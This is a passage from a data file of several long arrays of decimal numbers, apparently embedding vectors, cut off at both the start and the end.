0.022221016,-0.02098628,0.014761689,-0.023241827,-0.035006918,0.0331841,0.006803552,0.003317193,0.035691936,-0.07609047,-0.012016367,-0.005017869,-0.018803108,-0.047772992,-0.027330047,0.016410785,0.020105068,-0.016161032,0.013078823,0.0067273453,0.03688409,0.041977406,-0.0040160487,0.044396717,-0.052326906,-0.009018134,-0.006033292,-0.0049343035,-0.02483876,0.009264809,-0.0455711,0.030408522,-0.0019157955,0.00840687,-0.0015084321,0.024844397,0.023615783,-0.034291685,0.018393066,-0.014566818,-0.029442212,0.026710682,0.009686943,0.005846035,-0.012289299,0.029427333,0.0022413034,-0.07587929,0.050307125,0.006108661,0.049367223,0.032667384,0.0015981884,-0.0403946,-0.0010634143,-0.018205551,0.022898683,-0.032983758,-0.07208645,-0.0033842856,-0.05200794,-0.024465468,-0.020116014,0.02481303,0.023142934,0.04053159,-0.0000020449788,-0.0403207,0.028459515,-0.028410314,-0.022843737,-0.015617234,-0.043396335,0.067394726,-0.030898992,-0.014319836,-0.02580066,-0.030751834,0.069142185,0.009680306,0.009417504,-0.006498158,-0.023053596,-0.002420053,0.029716948,0.019038104,-0.006161721,0.069864854,0.030760253,-0.018754466,0.015941162,-0.00897821,-0.019066243,0.02379623,-0.015127612,-0.0048334016,0.08208591,0.018653404,0.0038999235,0.0380095,0.0061627533,-0.023311807,0.0034308308,0.028524961,0.021194424,0.05895857,0.02338666,-0.020314334,0.04830592,-0.015759086,-0.018974802,-0.029039457,0.02619219,-0.0011396287,0.01107901,-0.016590385,0.027655615,0.052526116,0.032368045,-0.01737442,-0.04145027,0.016615802,-0.042892147,-0.014379616,-0.063213155,-0.0199486,-0.008958392,0.015311505,0.018478766,-0.0038453145,-0.023024654,0.0012864547,0.05508897,0.04451416,0.03365178,-0.03338995,0.020408303,0.010937927,0.0052897246,-0.046279013,-0.02783626,-0.035556488,0.014335483,-0.059919745,0.009220941,0.025553815,-0.009342029,0.03027562,-0.04225902,-0.07019823,0.05861665,0.01898367,-0.03401509,0.056244273,-0.03801765,-0.0416616,0.043956265,-0.02053593,0.04118633,0.04615437,-0.04559958,-0.09229228,-0.015155092,0.00069416576,0.043688253,0.014364345,0.006977809,-0.0037032329,0.007492169,-0.0076654865,0.03032994,-0.0060565085,0.032506853,0.044385523,0.013468475,0.029006993,-0.00011479702,-0.045652688,0.04169639,-0.022837527,0.028427884,0.0080584055,0.0036108582,0.0027598056,-0.0108780395,0.040277634,-0.045941334,0.05054447,0.020482223,-0.015341349,-0.04928399,-0.08118764,0.006151245,0.027401619,0.050160393,-0.010813645,-0.077228084,0.0487388,0.013980346,-0.012006541,0.009010453,0.028454654,0.11121941,0.0029439465,-0.014700058,-0.024449471,0.0050709136,0.010668006,-0.0155368075,-0.01564094,-0.037081786,0.022860598,0.012533523,-0.005518638,-0.037376963,-0.057777174,0.0593665,0.045905102,-0.048347853,0.031938348,0.032964498,-0.04171093,-0.035398237,0.00830957,-0.015734183,-0.0021583757,0.0039284783,0.06755426,0.008488014,-0.03447195,-0.05006438,-0.046347097,0.0016624115,0.037071,0.010289157,-0.008234006,-0.018059287,-0.052681115,0.042231135,0.006443774,0.023374368,-0.033321638,-0.08304395,-0.016611423,-0.0455018,-0.021537999,0.026768805,0.010612747,0.043346398,0.058176603,-0.0064180535,-0.010785175,0.013949441,-0.03089169,0.07683317,-0.054389216,-0.06532379,0.0333507,-0.02292518,0.030668613,0.023720765,0.0345772,0.056535196,-0.014003932,0.0066449856,0.02067064,-0.016744649,0.032057527,0.019401759,-0.0146272285,-0.022767402,-0.047321856,-0.050025236,0.0020928846,0.01882551,-0.08541296,0.015281182,0.012512691,0.051362928,0.05832251,-0.051784564,-0.047425363,0.0020089543,0.011808152,-0.027765185,-0.012445906,-0.000257483,0.034711096,0.020974567,0.05648575,0.029731127,-0.022078434,0.011743118,-0.0031715797,-0.060273636,0.005039082,0.043965396,-0.060770255,0.0046250043,-0.019236995,0.015285619,-0.043014396,0.020071052,-0.014199867,-0.043125577,-0.020660302,-0.011445916,-0.060820263,-0.051762447,0.019959198,0.035777036,0.032733608,-0.066303685,0.017488968,0.00021314778,-0.018432805,0.01698044,0.06225542,0.0761947,-0.04874725,0.01634201,-0.037729748,0.001631412,-0.021109747,0.01688522,0.016109653,-0.011652943,-0.08392943,0.016202716,-0.049155775,0.0820946,0.05325192,-0.020765558,0.024921078,-0.072713725,-0.012334172,-0.00702129,-0.018509436,-0.005731533,0.011567407,0.0019847674,-0.048286263,-0.002026801,0.009489976,0.029006932,-0.0133933695,-0.028020475,-0.082133576,-0.022122169,-0.0024777416,0.09570831,-0.03586024,0.029398551,0.06151628,-0.016348217,0.06780298,0.004723834,0.0018770733,0.02995758,0.0056977523,-0.039333347,0.023077955,-0.00671135,0.044551894,0.04043883,-0.008850243,-0.050405182,-0.0211289,0.015070017,-0.031440068,0.043577194,-0.048988048,-0.0031704954,-0.02411085,0.012059306,-0.037075,0.0047068032,0.03637846,-0.075505435,-0.0026157799,-0.037548218,-0.01668322,-0.056532267,0.010037165,-0.0057781585,0.06637902,0.0038414139,0.039212003,0.043129425,-0.043549158,-0.03398572,0.010018588,0.014806814,-0.0057011666,-0.0081704315,0.10492989,0.050908666,-0.012599445,0.07219611,0.09072652,0.021101093,-0.027032018,0.00012518586,-0.007139436,0.017461244,-0.04063734,0.007711668,0.00580277,-0.008332278,0.0048570987,-0.05141081,-0.01709957,-0.00798234,0.007177017,-0.028198527,-0.024414385,-0.04857202,0.0070579895,0.05228329,0.020300848,-0.011043243,-0.04772475,0.003949017,-0.038623884,0.052087244,0.051710803,-0.02605633,-0.029927177,-0.013468104,-0.0022506735,0.061243225,-0.035874,-0.014553817,-0.024042364,0.04935324,-0.032846913,-0.037305385,-0.031459376,-0.018755402,-0.055330765,-0.010006884,0.02140611,-0.014201711,0.02298257,-0.015988315,0.00657291,-0.005894008,0.034593783,-0.037849538,-0.008444504,-0.0070832446,0.018056868,0.026930526,-0.01647855,0.05167886,0.00052167394,-0.0008151724,-0.043825418,0.016866926,0.002542662,-0.040833123,0.045556184,0.041143667,0.0018285464,-0.0055301245,0.01612038,-0.01036365,0.04465984,0.026440587,-0.02100604,-0.033893593,0.005807635,-0.025325567,0.0054028593,0.00031109902,-0.03710138,-0.0062275855,0.014808003,-0.004790449,-0.024309957,0.0049185585,0.042806465,0.004046866,0.044441834,0.00507885,-0.01832117,-0.039073635,-0.00476348,0.029937977,-0.0023019211,-0.0018568677,-0.015562799,-0.009022015,-0.016118053,-0.01462654,0.079100825,0.035343003,-0.04509404,0.010205179,-0.006330463,-0.030199585,-0.02150923,-0.06510145,0.015098943,0.009289275,0.019136595,0.13410571,0.013049043,0.008854926,-0.041597497,0.047671597,-0.012332059,-0.059601534,-0.017116474,0.0012001343,-0.050449587],[0.02064301,0.055064343,-0.17267942,-0.07866149,0.08513188,0.02236936,0.043196246,0.015891964,-0.038550097,-0.0026237764,-0.039636787,0.030973937,0.050640013,0.031843655,0.0104334,-0.031751297,-0.002896023,-0.051708464,-0.009985054,0.06243677,-0.023014264,-0.014123583,-0.0022473154,-0.08336453,0.074269615,0.038448308,0.009008076,0.009821864,-0.020892095,0.015505721,-0.0045670536,-0.0076650535,-0.050672643,0.027984496,-0.098234616,-0.01905469,0.02595604,0.018853009,0.008542308,0.016529618,0.04406184,0.039551742,0.0012387412,-0.017104931,-0.009825149,0.01796199,0.002152581,0.0290378,0.053217698,-0.08819087,-0.019196121,-0.028442318,0.028051782,0.012504926,0.06272665,0.039897833,0.015009946,-0.010936221,0.0054544713,-0.054358587,0.044847623,0.058218915,-0.099803485,0.045645922,-0.010987427,-0.011550251,-0.054352473,-0.007929852,0.014607252,-0.021481609,0.082387045,0.0011446956,-0.043128196,0.03637408,-0.046204835,-0.00842487,-0.02278896,-0.034807034,0.0018604858,-0.007046979,0.029831626,-0.014091361,0.04992733,-0.027174644,0.060826056,-0.0344267,-0.05748801,0.0010172282,-0.057463996,0.046465497,0.0044732434,-0.04432142,0.044766195,0.0026629877,-0.08183971,0.006759982,-0.0067775263,-0.001418748,-0.030334488,0.001230335,-0.03343734,-0.010447619,-0.0002951042,-0.006837279,0.0160924,0.068040304,-0.009805262,0.020674076,-0.019039106,-0.04349487,-0.014011037,0.05146129,-0.04475163,-0.02021856,-0.015410317,0.00050477986,-0.010462012,-0.06911517,-0.051997375,0.011498096,0.00074745086,-0.03725245,-0.051073186,0.06135314,-0.005140608,0.013028208,-0.056913417,0.016714271,-0.026087625,-0.011935714,0.005994665,-0.020031035,-0.05298035,-0.014483567,0.012648648,0.03494119,-0.047651786,-0.042396076,0.0522618,0.028342256,0.04142763,0.032162204,-0.023496231,-0.039130345,0.013839176,-0.06328441,-0.011708744,-0.04012636,-0.0481137,0.01041358,-0.0030661162,0.017104788,-0.01776379,-0.0072887633,0.047421757,0.0030701028,-0.009401119,0.0064353677,0.0050206636,0.03352786,0.0399125,0.032089427,-0.025336323,0.035160996,0.015881145,-0.06309826,-0.025784833,0.01654247,-0.011222226,0.02386043,-0.06551093,0.0035407841,0.017956607,-0.0537947,0.02893539,0.018617544,0.045956925,-0.023862166,0.019135198,-0.012200639,0.008573149,-0.05521583,0.07482804,0.017802518,-0.026223918,-0.026392885,-0.01649562,-0.009197967,0.00662008,-0.054482542,0.01303093,-0.008540829,-0.05811682,0.0034149303,-0.020171879,-0.060679965,0.012383282,-0.022458859,0.045743387,-0.016323794,-0.04743405,-0.03948225,-0.046616193,0.024326146,-0.060544617,0.05380713,0.0130499005,0.0052459748,-0.04493644,0.015638418,0.053644367,-0.0046267784,0.04238389,0.0004040684,0.016550614,0.028728368,0.014988033,-0.00028180736,-0.039708585,-0.017031487,0.008931247,0.0030757668,-0.012162419,0.011324096,0.022661973,0.018039662,-0.017378917,0.027425772,-0.026106905,-0.004633174,-0.012797922,-0.08445105,0.039524343,-0.01093116,0.015873756,0.050480228,0.019545268,0.043403327,-0.0033036524,0.03386266,-0.013602438,0.051425595,-0.03862209,0.062002584,-0.025989678,0.012392299,0.0027628718,0.0029150448,-0.008433797,0.039551433,-0.052432995,-0.002606021,-0.021640098,0.014871455,0.06574996,-0.04635258,-0.048834085,-0.0062329634,0.021787036,0.016052444,0.025138367,-0.04433214,-0.037054393,-0.012527105,-0.012429179,-0.0409389,-0.00339743,-0.008735608,0.01779519,-0.006687206,0.001319348,0.07023542,0.04699867,0.025057888,-0.004667682,0.009147925,-0.026407233,-0.00062092324,0.013316435,-0.014424106,-0.017425872,-0.009089121,-0.04273658,0.036358375,-0.003457601,-0.0019898782,-0.004351584,0.0069369404,0.013419941,-0.03605016,0.019519903,-0.015728487,-0.047479697,0.01865459,-0.014288281,-0.0018721166,0.018342594,0.003404175,0.04322074,-0.06572993,0.06325273,0.022691006,0.019589825,0.012683952,0.02084421,-0.040543154,0.008075871,-0.026796885,0.023231192,-0.04445357,-0.056162547,0.0177429,-0.0035747497,0.0026449857,-0.028024424,0.007395285,0.009000093,0.059986982,0.0006538858,-0.004057429,0.0038013163,-0.03776345,0.023499507,-0.00028716505,-0.047851007,0.07286256,-0.04401825,0.012258858,0.0104912445,-0.022514444,0.051244833,0.015132209,0.03646213,-0.039776508,-0.036312174,-0.0130110765,0.023856986,0.03663352,-0.0037295353,0.04548645,0.037223913,0.041099887,0.023351923,-0.018845683,0.017664734,0.03656557,-0.039501656,-0.012291439,0.07053955,0.021815065,0.011878366,0.026863014,0.0043051424,-0.012412424,0.019595616,0.007524246,0.04603475,0.01895195,0.026985891,-0.024982018,0.06799251,0.0061337412,-0.011013294,-0.00074708427,0.016814508,0.031285677,0.021948112,-0.00168939,0.008856832,0.01671368,-0.026962865,-0.006840319,-0.0311846,0.019521357,-0.03137587,-0.0236772,-0.09095615,0.008518256,0.01220146,0.053820726,-0.025443932,0.0012143558,0.050382003,0.017272994,0.028321479,0.022574104,0.010703425,-0.020678954,0.013271268,0.021084912,-0.018121129,0.014606939,-0.06902265,0.01041358,0.033622615,-0.060892813,0.019397685,0.06428921,0.008632356,0.073575,-0.033759687,-0.05468792,0.038082976,-0.015734341,-0.03523684,0.0012239446,-0.027559329,-0.02671813,0.035496395,-0.019334009,0.0057309987,0.029038772,-0.008707706,-0.08134317,0.003404257,0.011451164,0.04467414,0.006631317,-0.031477682,-0.05091832,0.019015085,0.03423033,0.013205787,0.0017518417,0.02525188,0.067122936,0.026389915,0.060517125,-0.013932022,-0.026344389,0.079454064,0.008383289,0.06515912,0.02377192,0.026143046,0.0028713595,0.018978007,0.021950064,-0.017161366,0.033063598,0.068286695,-0.06515858,-0.07589238,-0.04589164,0.018312572,-0.0016377445,0.058753897,-0.03137237,-0.085936114,0.034437064,-0.020917948,0.018500067,0.01142037,0.036972485,0.13734485,0.0047460306,0.020995172,-0.020639706,-0.03487929,0.031341925,0.0076297875,0.027769653,-0.024577618,0.008348538,0.021196613,-0.03581135,-0.0035304383,-0.069250174,0.06659211,0.022135684,-0.06224227,0.033060916,0.002337616,-0.06522057,-0.011318375,-0.0050399574,-0.031058583,-0.035683606,0.029417166,0.06302429,0.033885445,-0.039069608,-0.02174527,-0.01527439,-0.020072034,0.056337237,0.024969688,0.010485655,-0.02124177,-0.021668699,0.049808323,-0.014040414,0.02934301,-0.01837873,-0.074811995,-0.017861798,-0.012160694,0.037981465,0.01122217,0.032513704,0.029035714,0.06433602,-0.02031415,0.0285795,0.04961045,-0.012546262,0.07285273,-0.05102131,-0.04352385,0.03058696,-0.0064318357,-0.0011942522,0.018022059,-0.0003777157,0.0635269,-0.050300516,0.0023728788,0.004709766,-0.043882053,0.010114652,0.009852679,-0.049061432,-0.035356775,-0.03152908,-0.04722647,0.01128781,0.029982576,-0.11625543,0.013413344,0.010690387,0.024255067,0.040613543,-0.04948946,-0.018736841,0.032337476,-0.011249718,-0.009121921,0.021350281,0.009216892,0.039617505,0.04198459,0.028843822,0.026997546,0.00017142738,0.0058402987,0.042944346,-0.01123429,0.022072906,0.023310952,-0.08159125,-0.009354678,-0.029515749,0.004659793,-0.045840118,0.04177452,-0.04283078,-0.03936647,-0.038336467,-0.073027186,-0.064431295,-0.03141959,0.006207176,0.06990452,0.012280683,0.006438092,-0.016445441,-0.03194797,0.007113258,0.0062405984,0.0075642364,0.025340185,-0.03652542,-0.004752549,-0.021413965,-0.020982651,0.016045427,0.022637894,0.000560188,-0.06501453,-0.08034646,0.044153422,-0.04893358,0.035010066,0.038649272,-0.008890625,0.029006444,-0.04569389,0.008078509,0.008957997,-0.02855183,-0.019376123,-0.0056906934,0.019091627,-0.02211529,-0.021775518,-0.006720317,-0.0032196802,-0.017901434,-0.02836365,-0.10022496,0.028601618,0.05514942,0.08564488,-0.059959017,0.01945932,0.06554684,0.042027757,0.02808389,-0.01713065,-0.0077251475,0.028334692,0.043301005,-0.0066188644,0.004253066,0.004015718,-0.044446543,0.049970955,-0.01683491,-0.03679019,-0.06130292,-0.012587822,-0.02165638,0.05815818,-0.07461108,0.047511797,-0.014852928,-0.03136793,-0.016941408,-0.025266128,0.021992883,-0.0535752,0.018465389,-0.029868767,0.016053323,-0.08211857,-0.004385751,0.023975838,0.060947716,-0.017577918,0.03164005,0.036425706,-0.018982885,-0.018382784,0.034127865,0.04202722,-0.016782748,0.01816335,0.07423858,0.028568082,-0.015483522,0.038581353,0.05991481,0.054048058,-0.0150709925,-0.01822935,-0.0052698636,0.027914332,-0.013982118,-0.011776535,-0.0031717746,-0.020772276,-0.02269925,-0.068055876,0.010945306,0.017462246,-0.011910317,-0.004993544,-0.0030080872,-0.0027097103,-0.023405004,0.053954978,0.0052018017,0.008252408,-0.049987253,0.018193373,-0.01633206,0.039021187,0.027608529,-0.011841365,-0.026341414,0.046158474,0.01735004,0.037966803,-0.016391376,-0.029629786,-0.0269803,0.044845548,-0.025997838,-0.043609902,-0.02184986,-0.0069759106,-0.03940928,-0.003939771,-0.0025652575,0.02894651,0.030021388,0.0015029992,0.0005809913,-0.014450891,0.09247009,-0.00399357,0.013755476,-0.0058197267,0.031402852,0.015549962,-0.024577523,0.04134441,0.0297439,-0.0018031957,-0.04953845,-0.013519149,0.02296032,-0.0818595,0.062984355,0.003441304,0.025743773,-0.018952418,-0.019012135,0.05222846,0.027743863,0.025065541,0.002741136,-0.030120965,-0.004260304,-0.026893001,-0.0018556893,0.018132985,-0.03573086,0.021916538,0.028465696,-0.016649727,-0.018916152,-0.023406725,0.07112268,0.015170868,0.058724627,-0.0062727607,-0.003300327,-0.01986074,-0.009711179,-0.02804534,0.0047633895,-0.0040879897,-0.0027947037,0.007925174,-0.057690144,-0.016517702,0.06595399,-0.021453433,-0.04807875,0.03643687,-0.0091984,-0.035121493,0.03486002,-0.06635061,0.008124313,0.030884815,0.03509183,0.10586179,-0.023407556,0.011406692,-0.020780291,0.027009627,-0.0014129194,-0.04713096,-0.026739107,0.0077128056,-0.049200255],[-0.010806217,0.094713196,-0.19802643,-0.029788125,0.09344334,0.01729219,0.033965304,-0.0069765393,-0.029161692,-0.0315263,-0.015070958,0.007742771,0.033234596,0.02104031,0.009289427,-0.09471482,-0.02052725,-0.07326916,-0.0036368088,0.033987235,-0.049065158,0.028478274,-0.0011391225,-0.065622,0.06939921,-0.015016546,-0.019716136,-0.003948268,-0.0037289425,0.008071629,-0.028100671,-0.019192278,-0.05108006,0.04786426,-0.06835544,-0.018749664,0.044473637,0.047445703,0.026532931,0.016862635,0.037059467,0.053981602,0.008337223,-0.015552678,-0.015600088,0.036655813,-0.0030170768,0.0346422,0.043578446,-0.06837788,0.0070971064,-0.04450189,0.05871069,-0.016082961,0.09479187,0.02538927,0.009163615,-0.036003195,0.017434983,-0.0023134598,0.022690741,0.08251891,-0.08011582,0.05609162,0.005980981,-0.017192036,-0.057686523,0.035901196,0.0068222815,-0.014875925,0.09374025,-0.06748708,-0.016987076,0.029894063,-0.053403605,0.023006288,0.0051011182,-0.023517264,-0.0006634585,0.024635,0.04602905,-0.023420367,0.052462336,-0.022345083,0.035776347,-0.016947629,-0.03698245,-0.0007175624,-0.02567347,0.057474133,0.00495759,-0.03889121,0.020905038,0.06094279,-0.09840777,-0.009108748,-0.009385165,0.019154113,-0.033113703,-0.0032772077,-0.061466783,0.0049463147,0.06223846,-0.019875666,0.007938083,0.08847665,-0.028902296,0.019049514,0.00037478196,-0.038080435,0.0059245434,0.09680659,-0.030148529,-0.020252332,-0.005272468,-0.020644756,0.019696446,-0.0075303838,-0.0014154358,0.029045744,0.013327394,-0.029337859,-0.012956642,0.07253685,-0.019054512,0.0086528575,-0.04340971,0.027533328,-0.013753038,-0.033405583,-0.019068958,-0.025224341,-0.02065872,-0.05627727,0.016425336,0.07628244,-0.027308676,-0.040667035,-0.011505348,0.04664276,0.06320976,-0.0082312655,0.0026201701,-0.031719994,0.02757696,-0.05100743,0.00032340852,-0.05061579,-0.021305239,0.035934094,-0.00312418,0.033650614,-0.015884914,-0.008779271,0.07985746,0.010106386,-0.012439668,0.015521225,0.046436533,0.022725374,0.041109096,0.028611189,-0.03992007,0.034676027,-0.0122005725,-0.031163817,0.0016665155,0.052700613,-0.029551597,0.037966847,-0.056276344,-0.00666693,0.0036638975,-0.014901109,0.015743822,-0.007615766,0.047942966,-0.012240457,-0.030294541,-0.015697926,-0.004856113,-0.03680277,0.050659392,0.015647084,-0.028689701,-0.012283719,-0.0015288076,-0.033749644,-0.007958698,-0.050542045,0.006009881,0.003579737,-0.017616311,-0.020076072,-0.026663464,-0.051648688,0.012369718,0.012247177,0.024057034,-0.048070736,-0.004611863,-0.017659765,-0.030317286,0.027478559,-0.03568898,0.055438496,-0.015712205,0.01769618,-0.032748237,0.021136554,0.07369952,-0.025433406,0.0530144,-0.008046787,0.0001775556,0.013884571,0.017859083,0.001874301,-0.07314706,-0.012643353,0.035541765,0.019445611,-0.06593514,-0.014255476,0.051921315,0.01896459,-0.020518042,0.027386278,-0.0027831942,0.008632419,-0.027819784,-0.10645135,0.051248718,0.0018306216,-0.048275724,0.0072214613,0.00924458,0.04848171,0.028093804,0.043391734,-0.0186912,0.077940844,-0.031601265,0.008933587,-0.03189229,0.0052999076,-0.011948476,-0.07736391,-0.009504126,0.056191117,0.0019081474,-0.004765808,0.017392194,0.0045835264,0.054911643,-0.03664276,-0.027053153,-0.012534608,-0.0023729608,0.0021579259,0.027861938,-0.014204914,-0.03533768,-0.019580096,-0.032082852,-0.043016076,-0.010143459,0.04976081,-0.00034269592,0.004022753,0.010956356,0.06919027,0.026433073,-0.01361753,-0.012457968,-0.01617612,0.0020963172,-0.023080165,-0.028256368,-0.022490636,0.006114872,0.014696935,-0.025084386,0.015377359,0.0033984256,-0.0010482182,0.0180383,-0.02168935,0.018843096,-0.0058860043,-0.004497112,-0.040907625,-0.024140656,0.027026188,-0.009355573,-0.017614506,0.054834448,0.008679136,-0.0037534318,-0.05698591,0.054689508,-0.0000026350938,0.04225444,0.025702337,0.0046237735,0.0109937,0.0564282,-0.02313474,0.00958344,-0.0145175345,-0.058942154,0.01510037,-0.004839756,0.018136073,-0.020882722,-0.0049405573,0.020604275,0.035089258,0.025152266,0.010414244,-0.0068683717,-0.032678574,-0.028510427,0.001512954,-0.044926472,0.079034,-0.026589513,0.0075711096,0.011248466,-0.054033585,0.023401737,0.044438392,0.006219561,-0.05868682,-0.018538322,0.0106708845,0.012167654,0.03950799,-0.017099848,-0.026859283,0.07200757,0.020179806,0.028808273,-0.052047197,-0.0030035544,0.008278251,-0.058251355,0.022774369,0.011491577,0.028288437,-0.015275172,0.028660035,-0.04378619,-0.0122536,0.012006219,0.012013937,0.010995675,0.03880974,0.015701003,-0.010393727,0.055955987,-0.0002374856,-0.0313347,-0.0143610025,0.00092474493,0.017937856,0.006834256,0.00039573686,-0.02726632,0.04809082,-0.017379668,-0.0021730654,-0.036221124,0.012297201,-0.04344315,-0.0057298276,-0.09417,0.016100999,-0.03107452,-0.051636674,-0.036111202,-0.020570824,0.0390154,0.015395848,0.020587891,0.082278594,0.010226087,-0.053494476,0.014940009,0.014217491,-0.030304564,-0.008312044,-0.060804322,0.016360022,0.038952176,-0.016968546,0.05045561,0.0022070166,-0.0035627952,0.07944477,-0.018450493,-0.061521947,0.022788785,0.003229416,-0.015667086,0.043429345,0.011522143,-0.06423966,0.07553823,-0.04695192,0.042988162,0.053470127,-0.039325494,-0.056203764,0.034799136,0.017218586,0.034285106,0.011937217,-0.05664227,-0.0010578235,0.0090482,0.005480642,0.018503517,-0.00050347747,-0.025599059,0.06255161,0.034834627,0.028622314,-0.020437049,-0.0469072,0.03205673,0.011161943,0.005163806,0.002688567,0.018958677,0.0014348463,-0.009501669,0.018963601,0.023558194,0.07747907,0.07381686,-0.04217457,-0.07062454,-0.04189829,0.025642814,0.015031914,0.04634823,-0.0043733544,-0.092457466,0.0127241565,-0.002002361,0.01178539,-0.024372878,0.004381142,0.08833949,-0.02313065,0.015009151,-0.046842672,-0.020322198,0.011962328,-0.003572895,0.0155228255,-0.029514162,0.0040223165,0.017573971,-0.012342575,-0.0049860734,-0.057356447,-0.0039060034,0.026316049,-0.087127164,-0.005341234,0.013868347,-0.035793114,0.031615093,0.024760574,-0.0288886,0.021344522,0.000611454,0.056206357,0.03553477,-0.039815966,-0.0057782787,-0.03068883,-0.020040428,0.024291782,0.0035014907,-0.022095663,0.008902498,-0.04313508,0.035869334,-0.005717781,0.0016354282,-0.029750986,-0.010058549,-0.038508262,0.004473334,0.0636785,0.013109279,0.025724025,0.050065562,0.027604183,-0.017765893,0.0104123205,0.04324524,-0.025417008,0.07991575,-0.055007365,-0.027817283,0.024509642,-0.020522865,0.0009807064,0.009967461,-0.011981501,0.063753165,-0.048598353,0.047706507,0.019826962,-0.024938047,0.0357095,0.008916514,-0.018947195,-0.041189384,-0.03216821,-0.05622162,-0.0037862705,0.026659992,-0.07103713,0.07979168,0.027618287,0.0077630435,0.025201444,-0.031051619,0.004499215,0.0069304192,-0.016458591,-0.004441743,0.0022597325,0.0153372735,0.04870411,0.0034980406,0.042660136,0.0026680501,0.004527756,0.046661228,0.025045816,-0.03509721,0.06857344,-0.0005088355,-0.056846283,0.025891064,-0.063838385,-0.0016977614,-0.022604188,0.015757702,-0.0053528277,-0.022547238,-0.032449584,-0.07461455,-0.055141166,-0.030173177,0.04445507,0.01444801,-0.016839335,-0.0071578445,-0.051327083,-0.016490756,-0.016402455,0.04774046,-0.016290437,-0.015715202,-0.040478118,-0.028683774,-0.024992557,-0.029232433,-0.032304667,0.030493276,0.039031476,-0.08059019,-0.008465869,0.059883893,-0.016899796,0.057692066,0.029234786,-0.014688578,0.03097492,-0.06918708,-0.008024922,-0.013953236,-0.059808478,0.0027271952,0.040753976,0.021450387,0.0012528233,-0.0065791556,0.011018645,-0.018954933,-0.04220002,-0.018665107,-0.057865784,-0.0136609785,0.028882086,0.02592465,-0.026257662,0.03216509,0.10178893,-0.00010307741,0.031494245,0.011793343,0.01685526,0.008423622,0.022504207,0.0020809025,-0.0013155127,-0.007105872,0.005919795,0.03813274,-0.0075245076,-0.014585122,-0.022567619,-0.024799516,-0.041408174,0.07757035,-0.020568142,0.0913001,-0.01466927,-0.011708419,-0.036659695,-0.034211032,-0.0013886814,-0.06310019,-0.017886082,-0.04227973,0.0068006096,-0.07125534,0.005400336,-0.018199598,0.027972542,0.011615346,0.03716114,0.022045216,-0.0071341046,0.030942632,0.07095486,0.06252732,0.002327012,0.0031230128,0.040691193,0.046180125,-0.031625204,0.03792176,0.040087923,0.041050274,-0.005371265,-0.0070643644,0.012677213,0.06392394,-0.04236163,-0.014990839,-0.034779575,0.023179246,-0.033148162,-0.034157217,0.002983666,-0.008426012,-0.009979065,-0.042909008,-0.010572089,-0.05052124,-0.045117225,0.04436242,0.043005206,-0.0039464138,-0.031325947,0.04288376,-0.020972382,0.030273667,0.05306541,-0.0013484375,-0.03226816,-0.019247377,0.021776011,0.028663535,-0.039023373,-0.0338431,-0.043502074,0.047658324,-0.04508896,-0.04466402,-0.026540112,0.0017357793,-0.054472577,0.009551524,-0.012383147,0.017468646,0.037479613,-0.025612472,-0.014436401,-0.039908577,0.05167977,-0.020330166,0.030794403,-0.022922423,0.025632616,0.019972201,-0.011262453,0.02238274,0.025532633,-0.01392475,-0.03429817,0.00843446,0.027822847,-0.056893706,0.04386746,-0.007359102,0.028660774,-0.0012842614,-0.061168037,0.023410944,0.00095498574,0.042771775,0.0255191,-0.019252859,-0.025568197,-0.032455742,-0.01900371,0.030420452,-0.018705972,0.015265428,-0.002912151,-0.047887444,0.01835144,0.00019231299,0.054350797,0.040832706,0.025714159,-0.018084222,-0.014921242,-0.024511304,-0.013039115,0.025005428,0.054965965,0.0049010767,0.008117257,0.014659481,-0.040660173,-0.014961319,0.05203823,0.005083,-0.05259366,0.02785023,0.02198556,0.043402728,0.018707272,-0.0020584252,-0.0043347455,0.013459991,0.028200192,0.11212066,-0.024108304,0.01270726,-0.034994576,0.030032411,-0.016230013,-0.04179919,-0.03241264,-0.020562842,-0.048964653],[0.030438287,0.08066032,-0.16505559,-0.061531466,0.05273733,0.034180526,-0.010973133,0.022639306,-0.034785714,-0.0043934365,-0.006913861,0.034530003,0.073347054,0.018357825,0.018289248,-0.06474382,-0.024377026,-0.05813648,-0.028729081,0.029687265,-0.035640016,-0.008313824,-0.0113885,-0.07036701,0.07386775,0.054213446,0.02052534,-0.020736916,0.00083505915,0.0026950145,-0.022808168,0.045644563,-0.050252613,0.046621367,-0.07530597,-0.040408954,0.0043532904,0.0136247575,0.007485096,-0.0044513154,0.061675247,0.060753077,0.049527638,-0.053112213,-0.027286347,0.014073088,-0.005433615,0.015248043,0.08123283,-0.031043913,0.0010890216,-0.07351798,0.0039610206,0.0056390236,0.07813774,-0.013032234,-0.001359489,-0.028269872,-0.02457082,-0.049958285,0.06544128,0.06978575,-0.13061853,0.028136145,0.03921975,-0.017894391,-0.052661926,0.03340737,-0.013177609,-0.036290422,0.0653449,-0.015128362,-0.02201511,0.040734593,-0.050752252,-0.022612887,0.01677683,-0.04355901,-0.001980613,0.026732089,0.039000545,-0.0047169263,0.06710695,-0.0037469722,0.05574642,-0.030623017,-0.026661871,0.01710247,-0.0126305595,0.04151629,0.0026185499,-0.0021465926,0.025590356,0.019704336,-0.06843992,0.011729261,-0.0043977005,0.0013352673,-0.03475693,-0.009620137,-0.039788622,-0.010453366,0.06589872,0.012991873,-0.0026898142,0.05017482,0.023373507,0.00015291305,-0.0051526143,-0.0073840637,-0.00585899,0.06714506,-0.011580854,-0.02147941,-0.019748753,-0.01089309,0.030754847,-0.037866987,0.0066226358,0.01321634,0.04086012,-0.026434997,-0.05740805,0.06471411,-0.012316758,-0.012252432,-0.04304603,0.015879324,-0.03249408,-0.03343843,-0.034844752,-0.03616605,-0.010275145,-0.034104314,0.013293073,0.060670104,0.007337711,-0.026858225,0.0028666798,0.021676851,0.04972623,0.031598635,0.002556226,-0.04750052,0.003031628,-0.0471201,0.01793983,-0.062467147,-0.023967776,0.03723128,0.030297639,0.041462816,-0.019370196,-0.031077646,0.026186021,-0.0042743287,-0.03965776,0.029216306,0.008652718,0.03609811,0.043279897,0.04245351,-0.029828833,0.059793476,-0.013575498,-0.049796067,-0.034827832,0.05069243,-0.011809511,0.03883358,-0.075135596,-0.00989887,0.0071712327,-0.045465566,0.004921862,-0.010732157,0.050798904,-0.03070356,0.02405657,-0.0007229777,-0.0026942403,-0.052682877,0.07229799,0.0176871,-0.022175588,-0.01820421,0.008639682,-0.03200262,0.029364496,-0.0039509013,0.008981296,0.0055291555,-0.05147793,-0.01480078,-0.020539703,-0.057555243,-0.005772372,0.030320112,0.039326504,-0.05893991,-0.040023614,-0.044824086,-0.06664396,0.0059326245,-0.03592984,0.03708062,-0.0030091098,0.018144984,-0.043928538,0.026838133,0.06382799,-0.0166066